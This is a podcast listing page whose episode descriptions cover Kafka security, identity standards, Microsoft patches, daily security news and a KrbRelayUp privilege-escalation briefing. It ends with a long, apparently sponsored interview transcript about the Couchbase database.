Security is a primary consideration for any system design, and Apache Kafka® is no exception. Out of the box, Kafka has relatively little security enabled. Rajini Sivaram (Principal Engineer, Confluent, and co-author of “Kafka: The Definitive Guide” ) discusses how Kafka has gone from a system that included no security to providing an extensible and flexible platform for any business to build a secure messaging system. She shares considerations, important best practices, and features Kafka provides to help you design a secure modern data streaming system. In order to build a secure Kafka installation, you need to securely authenticate your users. Whether you are using Kerberos (SASL/GSSAPI), SASL/PLAIN, SCRAM, or OAUTH. Verifying your users can authenticate, and non-users can't, is a primary requirement for any connected system.But authentication is only one part of the security story. We also need to address other areas. Kafka added support for fine-grained access control using ACLs with a pluggable authorizer several years ago. Over time, this was extended to support prefixed ACLs to make ACLs more manageable in large organizations. Now on its second generation authorizer, Kafka is easily extendable to support other forms of authorization, like integrating with a corporate LDAP server to provide group or role-based access control.Even if you've set up your system to use secure authentication and each user is authorized using a series of ACLs if the data is viewable by anyone listening, how secure is your system? That's where encryption comes in. Using TLS Kafka can encrypt your data-in-transit.Security has gone from a nice-to-have to being a requirement of any modern-day system. Kafka has followed a similar path from zero security to having a flexible and extensible system that helps companies of any size pick the right security path for them. Be sure to also check out the newest Apache Kafka Security course on Confluent Developer for an in-depth explanation along with other recommendations. EPISODE LINKSKafka Security courseKafka: The Definitive Guide v2Security OverviewWatch the video version of this podcastKris Jenkins' TwitterStreaming Audio Playlist Join the Confluent CommunityLearn more with Kafka tutorials, resources, and guides at Confluent DeveloperLive demo: Intro to Event-Driven Microservices with ConfluentUse PODCAST100 to get an additional $100 of free Confluent Cloud usage (details)   

Paul's Security Weekly
ESW #275 - Bill Bernard, Paul Lanzi

Paul's Security Weekly

Play Episode Listen Later Jul 29, 2022 114:48


In our research, 85% of security professionals attribute preventable business impacts to insufficient response practices. In this segment, Bill will discuss the key challenges slowing down response times, such as staffing challenges, alert quality, and organizational culture as primary factors slowing down response. This segment is sponsored by Deepwatch. Visit https://securityweekly.com/deepwatch to learn more about them!   This week in the Enterprise News: Lacework lays off approx 300 employees, US Narrows Scope of Anti-Hacking Law Long Hated by Critics, Security Study Plan, DevSecOps Vulnerability Management by Guardrails, StackZone, Cipherloc Acquires vCISO Security Services Provider SideChannel, Broadcom to Buy VMware for $61 Billion in Record Tech Deal, Cyscale raises EUR 3 million in Seed Funding Round, & more!   There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi... Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)   Visit https://www.securityweekly.com/esw for all the latest episodes! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/esw275

Enterprise Security Weekly (Audio)
ESW #275 - Bill Bernard, Paul Lanzi

Enterprise Security Weekly (Audio)

Play Episode Listen Later Jul 29, 2022 114:48


In our research, 85% of security professionals attribute preventable business impacts to insufficient response practices. In this segment, Bill will discuss the key challenges slowing down response times, such as staffing challenges, alert quality, and organizational culture as primary factors slowing down response. This segment is sponsored by Deepwatch. Visit https://securityweekly.com/deepwatch to learn more about them!   This week in the Enterprise News: Lacework lays off approx 300 employees, US Narrows Scope of Anti-Hacking Law Long Hated by Critics, Security Study Plan, DevSecOps Vulnerability Management by Guardrails, StackZone, Cipherloc Acquires vCISO Security Services Provider SideChannel, Broadcom to Buy VMware for $61 Billion in Record Tech Deal, Cyscale raises EUR 3 million in Seed Funding Round, & more!   There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi... Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)   Visit https://www.securityweekly.com/esw for all the latest episodes! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/esw275

Get Certified Together - CompTIA Security Sy+ 601
Episode 6 - Security Implementation - Part 1

Get Certified Together - CompTIA Security Sy+ 601

Play Episode Listen Later Jul 7, 2022 14:19


In this episode, I will be covering topics from Domain 3 of CompTIA Security+ Sy 601. Topics covered in the episode are, Identity and Access Management Authentication, Authorization, and Accounting Role-Based Access Controls Multi-Factor Authentication Radius, LDAP, SAML, and OpenID

AVLEONOV Podcast
Ep.67 - Microsoft Patch Tuesday June 2022: Follina RCE, NFSV4.1 RCE, LDAP RCEs and bad patches

AVLEONOV Podcast

Play Episode Listen Later Jun 25, 2022 6:19


Hello everyone! This will be an episode about the Microsoft vulnerabilities that were released on June Patch Tuesday and also between May and June Patch Tuesdays. On June Patch Tuesday, June 14, 56 vulnerabilities were released. Between May and June Patch Tuesdays, 38 vulnerabilities were released. This gives us 94 vulnerabilities in the report. Watch the video version of this episode on my YouTube channel. Read the full text of this episode with all links on avleonov.com blog.

InfoSec Overnights - Daily Security News
Cisco Email Patch, Android Malibot, Zimbra Zinger, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later Jun 16, 2022 3:02


A daily look at the relevant information security news from overnight - 16 June, 2022Episode 246 - 16 June 2022Cisco Email Patch- https://www.bleepingcomputer.com/news/security/cisco-secure-email-bug-can-let-attackers-bypass-authentication/Android Malibot - https://www.zdnet.com/article/this-new-android-malware-bypasses-multi-factor-authentication-to-steal-your-passwords/PrintNightmare Still Exposed- https://www.infosecurity-magazine.com/news/new-printnightmare-patch-bypassed/Shoprite Compromised - https://www.bleepingcomputer.com/news/security/extortion-gang-ransoms-shoprite-largest-supermarket-chain-in-africa/Zimbra Zinger - https://portswigger.net/daily-swig/business-email-platform-zimbra-patches-memcached-injection-flaw-that-imperils-user-credentialsHi, I'm Paul Torgersen. It's Thursday June 16th, 2022, and this is a look at the information security news from overnight. From BleepingComputer.comCisco is warning customers to patch a critical vulnerability that could allow attackers to login into the web management interface of Cisco Email Security Appliance (ESA) and Cisco Secure Email and Web Manager appliances. The flaw is due to improper authentication checks on affected devices using Lightweight Directory Access Protocol (LDAP) for external authentication. From ZDNet.com:A new Android malware called Malibot steals passwords, bank details and crypto wallets, and bypasses multi-factor authentication. Oh, it can also access text messages, steal browser cookies and take screenshots. It is distributed through smishing and fake websites, one of which spoofs a legit crypto tracker that has more than a million downloads on the Play Store. Current targets are customers of Spanish and Italian banks. From Infosecurity-Magazine.com:On Tuesday, Microsoft released a partial patch for the PrintNightmare zero-day. On Wednesday they pushed an out of band patch for the remaining affected products. Later Wednesday, researchers found a way around the new patch to still exploit the original vulnerability. The ongoing flaw relates to the Point and Print function, which microsoft says is not directly related to the flaw, but has a weak security posture which makes exploitation possible. From BleepingComputer.com:Africa's largest supermarket chain, Shoprite, has been hit by a ransomware attack. The company, which operates almost three thousand stores across twelve countries in the continent, warned customers Eswatini, Namibia and Zambia that their personal information may have been compromised. A threat group called RansomHouse has claimed responsibility for the attack. There has been no mention of any business disruptions or operational issues, so this may be a straight data theft with no files encrypted. And last today, from ZPortSwigger.net Business webmail platform Zimbra has patched a memcached injection vulnerability that could allow attackers to steal login credentials without user interaction. It would steal cleartext credentials from the Zimbra instance, when the mail client connects to the server to check their mail. Details and a link to the Sonar research in the article. That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

Paul's Security Weekly TV
What's Happening with SCIM - Paul Lanzi - ESW #275

Paul's Security Weekly TV

Play Episode Listen Later Jun 14, 2022 28:49


There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi...   Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw275

fido saml ietf ldap segment resources
Enterprise Security Weekly (Video)
What's Happening with SCIM - Paul Lanzi - ESW #275

Enterprise Security Weekly (Video)

Play Episode Listen Later Jun 14, 2022 28:49


There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi...   Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw275

fido saml ietf ldap segment resources
The Cyber Threat Perspective
Threat Intel Flash Briefing - Kerberos Relaying to Local SYSTEM

The Cyber Threat Perspective

Play Episode Listen Later Apr 27, 2022 23:59


There exists a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings). Thanks to the research and open source tools of several researchers, it's now trivial to elevate to SYSTEM on most Windows Operating Systems.Resources:https://github.com/Dec0ne/KrbRelayUphttps://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.htmlhttps://github.com/cube0x0/KrbRelayhttps://github.com/Dec0ne/KrbRelayUpSocial:https://twitter.com/cyberthreatpovhttps://www.youtube.com/channel/UCCWmudG_CTNAFBaV48vIcfw

Screaming in the Cloud
To SQL or noSQL, Why is that the Question with Chris Harris

Screaming in the Cloud

Play Episode Listen Later Apr 26, 2022 40:33


About ChrisChris Harris is Vice President, Global Field Engineering at Couchbase, a provider of a leading modern database for enterprise applications that 30% of the Fortune 100 depend on. With almost 20 years of technical field and professional services experience at early-stage, open source and growth technology companies, Chris held leadership roles at Cloudera, Hortonworks, MongoDB and others before joining Couchbase.Links Referenced: couchbase.com: https://couchbase.com LinkedIn: https://www.linkedin.com/in/chris-harris-5451953/ Twitter: https://twitter.com/cj_harris5 TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Couchbase Capella Database-as-a-Service is flexible, full-featured and fully managed with built in access via key-value, SQL, and full-text search. Flexible JSON documents aligned to your applications and workloads. Build faster with blazing fast in-memory performance and automated replication and scaling while reducing cost. Capella has the best price performance of any fully managed document database. Visit couchbase.com/screaminginthecloud to try Capella today for free and be up and running in three minutes with no credit card required. Couchbase Capella: make your data sing.Corey: This episode is sponsored in part by LaunchDarkly. Take a look at what it takes to get your code into production. I'm going to just guess that it's awful because it's always awful. No one loves their deployment process. What if launching new features didn't require you to do a full-on code and possibly infrastructure deploy? What if you could test on a small subset of users and then roll it back immediately if results aren't what you expect? LaunchDarkly does exactly this. To learn more, visit launchdarkly.com and tell them Corey sent you, and watch for the wince.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. One of the stranger parts of running this show is when I have a promoted guest episode like this one, where someone comes on, and great, “Oh, where do you work?” And the answer is a database company. Well, great, unless it's Route 53, it's clearly not the best database in the world, but let's talk about how you're making a strong showing for number two.It sounds like it's this whole ridiculous, negging nonsense or whatever the kids are calling it these days, but that's not how it's intended. Today's promoted guest is Chris Harris, who's the Vice President of Global Field Engineering at Couchbase. Chris, thank you for joining me and I really hope I got it right and that Couchbase is a database company or that makes no sense whatsoever.Chris: It's great to be on the show, and thank you for the invitation. I'm looking forward to it. Yeah, we're a database company. That's exactly what we do.Corey: I always find it interesting when companies start pivoting from a thing that they were and, “What do you do?” “We build databases.” [unintelligible 00:01:29] getting out of that space it's, “What do you do?” “We're a finance company.” And then there's a period of time in which they start reframing what they do. It's, “We're a data platform.” Or, “We're now a tech company.”Really? Because I don't get that sense in any meaningful perspective. Couchbase was founded as a database company. You went public last year—congratulations on that—and now you continue to say, “Yes, we're a database company,” rather than an everything trying to eat the world all at the same time, mostly ineffectively, company. So, what kind of database are you folks?Chris: So, if you look at the database world, you can see—I've been in the space for quite some time now, a good few years, and I've had the privilege, if you like, of being at other database companies, been in the analytics space, and I'm here at Couchbase. But if you look at the history over the last—let's just not go back all the way that far, but let's go back to, like, ten years ago, everybody was building their applications on traditional relational databases. And what you saw is that the Oracle and MySQL, as traditional databases of the world. And then… probably at the time, we realized that with, talking ten years ago where we had this demand for high throughput of data, next generation of applications will be built, and then people realized the traditional database architectures weren't going to cut it, if you like. And it spawned this industry.You know, a big NoSQL market was created. And you have document databases, and then you have graph databases, and then you have analytics databases, and you have search databases, and then you have every sort of database you could possibly think of type database that's out there in the world.Corey: You have so many kinds you need to keep track of it all inside of the database.Chris: That's what you have to do, right? [laugh]. But the interesting thing is it became different types of database. And even see this in many of the code providers today, right, that you have multiple different types of databases no matter what you're trying to do, right? So, we kind of went—Couchbase kind of took a step back and went, okay, we were originally a cache, right, this is where we came from, and then kind of built that into a document database, and then kind of went to the market and went hold on here, rather than it being let's call it a noSQL versus SQL discussion, why can't it just be a database, right?Why can't you have a SQLite interface on top of a modern architecture? Why can you do that, right? Why can't you have the flexibility and architectural [unintelligible 00:04:16] of a JSON-based database with the interface of—with SQL, and then analytics built on top of that, right? So, why can't you have the power of SQL on the next generation architecture? So, that's kind of where we fit in the world.Corey: When we talk about origin stories and where things come from, well, let's start with you. I guess the impolite version of the question is, “Why on earth would you be in a space like this for so long?” But you've been on a lot of interesting places doing somewhat similar things. You were at Cloudera, you were at Hortonworks until you apparently heard a who or whatnot, you were at MongoDB, you were at VMware, you were at Red Hat. And that's going reverse chronologically, but it's clear that you're very focused on a particular expression of a particular problem. Why are you the way that you are? Only pretend that's a polite question.Chris: “Why am I the way that I am?” Well, first of all, I love technology, right? That's the key. And I think many of us in the industry would definitely say that, right? I started off in core engineering, building—I know some people today wouldn't probably remember this, but when you had Chip and Pin where your credit card and you have to type it in and put in a pin number, that was created originally in the UK, and then went off and built e-commerce websites for retailers.Well, that then turned into—was a common theme that I kept seeing is that lot of the technology that we're using was open-source technology. And that kind of got me into the open-source movement, if you like, and I was lucky enough to then join Red Hat when they built middleware frameworks, so got into that space there. And then did a lot of innovation in the middleware space. Went to SpringSource and we did some great work there in the Java Development Framework space. But what became interesting is that—you still see it today—like, in this innovation happening in that middleware space and there's some great innovation happening, right?There's all this stuff with Lambda and serverless architecture that's out there, but they always came back to, we've got the database, this thing that is in the architecture if it goes down, you're stuffed, right? This is where the core value of your company is sitting. So, then that got me interested to see what innovation was happening in this space. And as I say, I got into this field in the early stages of NoSQL, where there was that spawn of new database technologies being created. And then from there, it was like, “Okay, let's get into what was happening in the analytic space.”Again, I'm still in the Hortonworks, and Cloudera space, that's all open-source. But it came down to this is different types of databases that were required different types of skills. And then I started talking to the team here, who was like, “How can we take as great innovation and leverage the skills I already have?” And I thought that was an interesting point.Corey: In the interest of full disclosure, I tend to take the exact inverse approach to the way that you did. When I was going through the worlds of systems administrator, than rebadged as DevOps, or SRE, or systems engineer, production engineer, whatever we're calling ourselves this week, I was always focused primarily on stateless things like web servers, or whatnot because it turns out that—this should be no surprise to longtime listeners of this show—but I'm really bad with computers. And most other things, too; I just brute force my way through it. And that's hilarious when you keep taking down web servers you can push a button and recreate. When you do that to a database or anything that's stateful, it leaves a mark.And if you do it the wrong way, just well enough, you might not have a company anymore, so your DR plan starts to look a lot more like updating your resume. So, I always tried to shy away from things that played to my specific weaknesses that would, you know, follow me around like a stink. You, on the other hand, apparently sound—how to frame it—you know, good at things, and in a way that I never was. So you're—ah, you see a problem, you're running towards it trying to help fix it; I'm trying to how do I keep myself away from making the problem worse is my first approach. It seems like you have definitely been focused on not just data themselves—I mean at some level, [if it was a 00:08:55] pure data problem, it feels like we'd be talking a lot more about storage, but rather how to wind up organizing that data, how to wind up presenting that data, and the relationship that data has to other things that are going on. I'm not speaking in the sense of a traditional relational database, necessarily, but the idea of how that data empowers businesses and enables them to do different things. Is that directionally a fair synopsis of how you see it?Chris: I think the [unintelligible 00:09:21] thing is what I would agree with. What makes it really interesting to me is what we enable people to do with that data, and being able to build, kind of, really fascinating innovation applications that are affecting their underlying businesses, right, from it could be health care, it could be airlines, financial services, some really high, interesting use cases that people are doing that are leveraging the database to be able to drive that level of innovation. Because it's very difficult; I can build some sophisticated application, but if I can't get the performance out of my database, I have a pretty poor experience to my users in today's world. Because, fortunately or unfortunately, people aren't very patient, right? If you have a website that doesn't return very quickly, a customer's gone like minutes ago. You literally got to instantly respond to someone. That's a challenging problem.Corey: It absolutely is. Something that I found as I've talked to a bunch of different companies operating in different ways is the requirements on data stores are generally very different depending upon primarily latency and performance. There's only so long people that are going to watch the spinning circle of doom on a website spin before they realize they're going to go somewhere that has its act together. Conversely, for a lot of business intelligence and analytics queries, there are an awful lot of stories where the thing that people care about is that we actually have to have the results of this query by noon on Thursday. And there are very different use cases for that, and some companies seem to be focused very much on, “We're going to solve both of those use cases extremes and everything in between with the same product offering,” and others tend to say, “Okay, this is the area of the market we're going to focus on.”You could also say that this is an expression of the larger industry question of do I want, more or less a one-size-fits-most database that's general-purpose, or do I want very specific purpose-built databases based upon the use case and the problem? Where do you find yourself on that spectrum?Chris: I find myself on that spectrum is that there's—if you want to describe it at a high level and we can break it down, there's operational-type databases, where I'd say Couchbase fits where you're talking about, I've just built an application; I'm talking to the live user, right, this is what I care about, and when I'm talking about speed and performance here, I'm talking about something that returned within milliseconds of response time. I'm playing an online game, or I'm doing online betting on a sports game. That has to be pretty much instant, right? If we're playing multiplayer games and you're doing something, then I want to be able to see what you're doing straight away, right? People don't expect it to lay there.If you're looking at streaming—people do this with Couchbase—streaming the Olympic Games or Super Bowl in the US, and you want to be able to be there, that whole profile management of that user has to be instant, have that stream to you has to be instant. People use telephone calls and use Couchbase to do, behind the scenes, profile management, right, so they know who you are who's making that call. That's an operational database problem. That's not a traditional analytical problem, right? So, there's a whole other space in the database world for analytics, right, which is bringing all the data together into one place, and I'll help you do data science, AI, machine learning, be able to crunch and compute large volumes of data. If I get back to you, rather than a week in an hour, that's great, but that's not operational. That's analytical.Corey: In data center environments, it's an argument to be made for going in a bunch of different directions; we're going to use a bunch of different data stores to store all these things. Because, generally speaking, the marginal cost of moving data from one of your data storage systems to another one of your data storage systems, one rack row over is fairly small, whereas in cloud, effectively, there are no real capacity constraints anymore until you can get the bill, but that's the entire problem where a lot of the transfer for these things is metered per gigabyte. So, there's a increased desire on a lot of architectural pressures, to wind up making sure that where the data lives, it stays. And whatever it is that you do with that data, it should be able to operate on that data in a way that fits your performance characteristic requirements in the place that it currently is. And on the one hand, I can definitely see that driving a lot of decisions people have made.The counterargument is that it feels a little weird when the cost constraints of how the cloud providers—mostly you, AWS—have decided to build these things out. And that, in turn, is shaping your entire approach to not just your architecture, but your systems design of how data winds up working its way through your lifecycle. It's frustrating, on some level, especially given that they themselves offer something like 15 distinct managed databases offerings but more announced all the time. It becomes very difficult not only to disambiguate between all of them but to afford moving data from one to the next.Chris: The affordability is an interesting discussion, right, because you can look at it from a billing perspective and go absolutely, there's a challenge associated to that. Then is a question of where is my data because it's spread across all these different services; that's another challenge. And then you have the challenge of, okay, the cost associated to having developers build applications against all these different types of services because they all require different APIs and different ways of programming. So that's, there's a cost associated everywhere.Corey: Oh, by far and away, the most expensive part of your AWS, or any cloud spend, is not the infrastructure itself; it's the payroll expense associated with the people working on it. People always cost more than infrastructure. If not, something very strange is going on.Chris: But then you look at it, and you go, okay, if that's the case, I kind of use the analogy, right, that it's like a car, where everyone is talking these days about the electric car [that's going 00:16:05] on that path, right? Now, I should be able—if I was getting an electric car—think of it now, I actually have one—that I can get in the car and I can drive it like any other car. I know what a steering wheel is, I know where my pedals work, it looks and feels like a normal car. But architecturally it's fundamentally different how it operates. So, why can you apply that same thing, that same analogy to a database, right?So, why can't I have the ability from an operational perspective, [unintelligible 00:16:42] talk about operational databases, not necessarily, I don't know, full-blown analytical databases, but operationally being able to say I can store the data in an enterprise database; I can use that to leverage my SQL skills like I have before, and also use it to have a document store under operational analytics, to eventing, to full-stack search, key things that people want to do operationally, but keeping the data together in one database, like an iPhone. I want a database to have these capabilities; I don't want to have all these different types of devices that are everywhere. I want, you know, my iPhone to be able to go to have the capabilities that I'm using. Or my car, to feel like I'm driving a car; doesn't matter if the underlying architecture of the engine changed. That's great, I want the benefit, but I want to be able to drive it in the same way that I've driven any other car out there. And that's kind of trying to solve multiple problems that because you're trying to solve the issue of skills.Corey: It's one of the hard challenges out there, and I think your car analogy can even be extended a bit further because in the early days of the automobile, you were more or less taking some significant risk by driving a car if you weren't also mechanically inclined and to fix it yourself. And in time, we've sort of seen that continue to evolve where they mostly work, and now they work really reliably. And then you take it even a step beyond that, and all right now I'm just going to pay a car service so someone else has to deal with the car and a driver, and I don't have to deal with any of that aspect. And it feels like there are certain parallels, similar to that, toward the end of last year, 2021, you folks, more or less moved away from you can have it in any color you want, as long as you run it yourself—more or less—into offering a fully-managed database-as-a-service cloud option called Capella, which, on the ads for this show, I periodically sing because if you didn't want me to do that, you would not have named it Capella. Now, what was it that inspired you folks to say, “Hm, we could actually offer this as a managed service ourselves?”It's definitely a direction a lot of companies have gone in, but usually, they have to wait to be forced into it by—let's be serious for a second here—Amazon launching the Amazon Basics version of whatever it is themselves and, “Okay, well, they validated our market for us. Let's explore it.”Chris: If you look at that, you go Couchbase has been around for a good few years now selling, as you point out, high-performance databases to large-scale enterprises, on real mission-critical, people call it tier-zero type applications, high-performance applications. And these are some of the most fascinating, most innovative type of applications that I've been involved with through my career. Now, how can we take that capability, provide it to the mass market if you'd like, to be able to give it to people that don't need to have a large number of people out there managing their own infrastructure, being able to understand how to finely tune that underlying infrastructure to get the level of performance that you need from high-performance databases. Now, there are use cases for doing that, so it's not one or the other. It's not that you have to go all-in.There are particular companies out there that, for the economics reasons, for the use case reasons that are running today on-premise, and there's a rational reason for why they do that, right? But for a lot of people out there, whether they're leveraging the cloud, there's an opportunity here to take the power of the database, allow us to then manage it for people, take away that complexity of it, but being able to give them the power so they can leverage their skills, take advantage of Couchbase far easier than ever have been able to in the past. It's opened up a bigger market for us, to summarize your question.Corey: This episode is sponsored by our friends at Oracle Cloud. Counting the pennies, but still dreaming of deploying apps instead of “Hello, World” demos? Allow me to introduce you to Oracle's Always Free tier. It provides over 20 free services and infrastructure, networking, databases, observability, management, and security. And—let me be clear here—it's actually free. There's no surprise billing until you intentionally and proactively upgrade your account. This means you can provision a virtual machine instance or spin up an autonomous database that manages itself, all while gaining the networking, load balancing, and storage resources that somehow never quite make it into most free tiers needed to support the application that you want to build. With Always Free, you can do things like run small-scale applications or do proof-of-concept testing without spending a dime. You know that I always like to put asterisks next to the word free? This is actually free, no asterisk. Start now. Visit snark.cloud/oci-free that's snark.cloud/oci-free.Corey: One way that I tend to evaluate where a given vendor sees themselves—and it's sort of an odd thing to do, but given that I do fix AWS bills for a living, it probably makes sense—I wind up pulling up the website, I ignore the baseline stuff of the, “This is what Gartner says,” and here's a giant series of scrolls. I just go for the hamburger menu and I look for, “All right, where's the pricing information?” Because pricing speaks a lot. And there are two things I generally try to find. One is, is there a free trial that I can basically click and get started working with?Because invariably, I'm trying to beat my head off of a problem at two in the morning, and if it's, “Oh, talk to a salesperson,” well as a hobbyist, or as an engineer who does not have signing authority for things, but it's talk to sales, I realize, “Oh, yeah. One, I probably can't afford it. Two, it's going to be a week or so before I can actually make progress on this, and I'm hoping to get something up by sunrise, and it's probably not for me.” Conversely, the enterprise tier should always have a, “Call for details,” because that is a signal to large enterprise procurement departments and buyers and the rest were it's, “Oh, we will never accept default terms. We always want them customized. We also don't believe in signing any contract without at least two commas in it.”Great. So, being able to speak to both ends of the market is one of those critical things that you folks absolutely nail that. What I like is the fact that if someone has a problem that they're experimenting with at two in the morning, they can get started with your database-as-a-service platform—Capella; or however you want to sing it—and they don't need to wind up talking to you folks directly, first. There's no long-term commitments, there's no [unintelligible 00:22:39] of the infrastructure themselves. There's no getting hounded for the rest of their days over making a purchase for something that didn't pan out.To me, that's always been the real innovation and breakthrough of cloud is that I can spend a few hours some evening kicking around an idea, and if it doesn't work, I can turn it off and spend 17 cents on the process, whereas if it does work, I can keep scaling up without at some point having to replace all of the Raspberry Pi's and popsicle sticks, I build things with real enterprise-grade stuff. There's a real accessibility and democratization that is entered into it. So, I'm always excited when I see companies that are embracing that model. Because, yeah, I'm a grumpy old sysadmin because it's not like there's a second kind of sysadmin, but—and I have a particular exposure and experience level with these things that I can't expect modern developers to work on. They have an idea, they want to launch something, and they just need a database to throw things against and put data into, and ideally get it back again when they query later. And that empowers them to move forward.They're not in this because they really want to run virtual machines themselves and get those set up and secured and patched and hardened, and then install the software on top of it, and, “Why is it not working? Oh, security groups, how you vex me again. I'll just open you to the entire world,” and so on. And we know where that path leads. So, it's nice to see that there is an accessible option there.Conversely, if you come at this with an approach if we are only available in our hosted cloud environment, well now those big enterprise companies that have, you know, compliance concerns are going to have some thoughts for you, none of them particularly pleasant in some cases. So, I like the fact that you're able to expand your offering to encompass different user personas without also, I don't know, turning what has historically been a database into now it's an LDAP server, and trying to eat the world, piece by piece, component by component.Chris: It's interesting that you say that because I think there's a number of things that you're touching on that were to me, if you look at us as a company in particularly this space, there's a lot of focus around the community and the open-source community. And I think there's an element of how do you make it accessible to people as a community as a whole? And then you kind of go down the path of, “Okay, let's allow people,”—as a developer, let's think of it this way, right, the ultimate thing they want to do, and you touched upon it there, is they want to build an application. They get passionate about building the application or maybe even in the weekend, and they got this funky idea that they're going to literally knock some code out.And I remember my fond memories of being an application engineer of being able to sit down for hours just been able to put my ideas into code and watch it execute. The last thing that I want to do is get to the point where I get the database and go, oh, here we go. This is going to take me a bunch of hours, now, and I'm going to set it all up and do other stuff. And I almost literally want to be able to click a few buttons—Corey: You know what I want to do tonight? Feel really dumb as I tackle a problem I don't fully understand. Gr—I'd love smacking into walls that point out my own ignorance. It's discouraging as hell. I'm right there with you.Chris: Yeah, you don't want to do that, right? So, you almost want to make like the database disappear for people, right? You want to be able to just say, like, “Here's your command. Off you go. Bring the data back. Bring it back in full. Allow it to scale.”Because you want that developer to have that experience of not breaking their flow. And what do you want them to be able to be so excited about the application and innovation that they've built, that they want to go and show that teammates? They want to say, “Look at the great thing I built over the weekend. Look at this, this is amazing.” Right?And then be able to get all the teammates pretty excited about what they built in a way in which they can try it out really easily, right? They can take this little thing that they built into the database, click some buttons, and off we go, right? And now your development team is super excited about some of the great innovation that you have. But you also have to have the reverse. You have to have the architecturally sound, so then when you get to the architect, if you like, who is looking at the bigger picture of what's the future going to look like? Is it the right technology? Is this something that we can bring into the organization? And you know, this is a cool bit of application you just built me, but you know, is this realistic that I can deploy this thing?And this is where you start going back into it still has to have high performance, the security has to be there, the scalability has to be there so that I can potentially—I can start small and grow this thing horizontally as I see the requirements coming. There are different set of requirements architecturally, so we're looking at—you know, as a company, our key focus is how do you drive that developer community so that you give the people the freedom to build the next generation of applications in the simplest way [unintelligible 00:27:35], say with free trials, click some buttons, have the database up in minutes, but also then being able to have that capability in the underlying database to take it to the architect. That's what our core focus is every day.Corey: I agree with everything that you're saying. You're making an awful lot of great points, but for me, the proof in the pudding is the second thing that I tend to look at on your website after the pricing page, and that is your list of customers. Because it's always interesting when someone talks about how they're revolutionizing everything, and this is the way to go, and everyone who's anyone is doing these things. And then you look at their customer page and either they don't have one, which is telling, or the customers on that page are terrifying in that, “Wow, that sounds like a whole bunch of fly-by-night startups whose primary industry is scamming people.”You have a bunch of household blue-chip names as well as a bunch of newer companies that are very clearly not what people think of as legacy—you know, that condescending engineering term that means it makes money. It's across the board, it is broad-spectrum, and it is companies that absolutely know exactly what it is that they're doing when it comes to these things. That to me is far more convincing than almost anything else that can be said because it's—look, you can come on and talk to me about anything you want about your product, and I can dismiss it and, “Yeah, whatever. Great.” But when I start talking to customers, as I did prior to recording this episode, and seeing how they talk about you folks, that to me is what reaffirms that, okay, this is actually something that has legs and is solving real customer problems.Because early stage, it's, “We have this idea for this company we're going to build that it's going to be great.” “Awesome. Go talk to more customers.” That is a default, safe piece of advice generically you can give to anyone. And it's easy to give and hard to take.I've been saying this for years, and I still screwed it up and we started trying to launch a SaaS product here called DuckTools. Yeah, it turns out that we didn't talk to enough customers first about what they're actually trying to achieve, and we assumed we knew the answers. It's an easy mistake to make. What I really appreciate is—about a Couchbase in particular—is not just the fact that you have all of these customer references, but the fact that each one talks about what the value to the business is not just in terms of, “Oh yes, now we can query data and there was no way for us to do that before.” Of course, people have found ways to do that since business started.Instead, it's much more about this is how it made it more efficient, more optimal, how it unlocked possibilities and capabilities for us. That alone tells me that there definitely is significant value that you're delivering to customers. In my own business, whenever I think I've seen it all, I have to do is talk to one more customer and learn something new. What have you seen in recent memory, from a customer, that surprised you about how they're using Couchbase?Chris: You look at that, and you can see—I could probably talk for hours on different types of customers, but it's the ones that you can literally see in your life and you can reflect to, right? So, if you taken one of the biggest airlines that are out there today, they're completely changing, kind of, the whole experience. And our whole experience of and how do I get feedback? Because Couchbase's customers, [unintelligible 00:31:01] customer, right, is what they're thinking about, right? They're an airline.So, these passengers; fine. But how many times have you got on a plane, and you see all these people, literally, there's obviously the passengers, and then there's the cabin crew, and then there's the people on the ground, and then there's the pilot, and for the sake of the discussion, the staff that are there are literally passing paper back and forth to each other. And surely there a better way to do this. And for someone who likes to solve complex technical problems, you go, “Wow, this is going to be a bit of a challenge.” Because if you want to collect feedback from an aeroplane in the air, [laugh] right, and you want to connect that to the ground data that people are having in terms of maintenance data, you want to do that across the world, in multiple different time zones, that's pretty tricky problem to try to go solve, right?So therefore, how do you get a database that is able to work remotely and on what people would call the edge; let's just call it in this case in a device that's literally a cabin crew member is carrying around with them that's not connected because there is no connection because I'm in the middle of the air. But I want to pair it 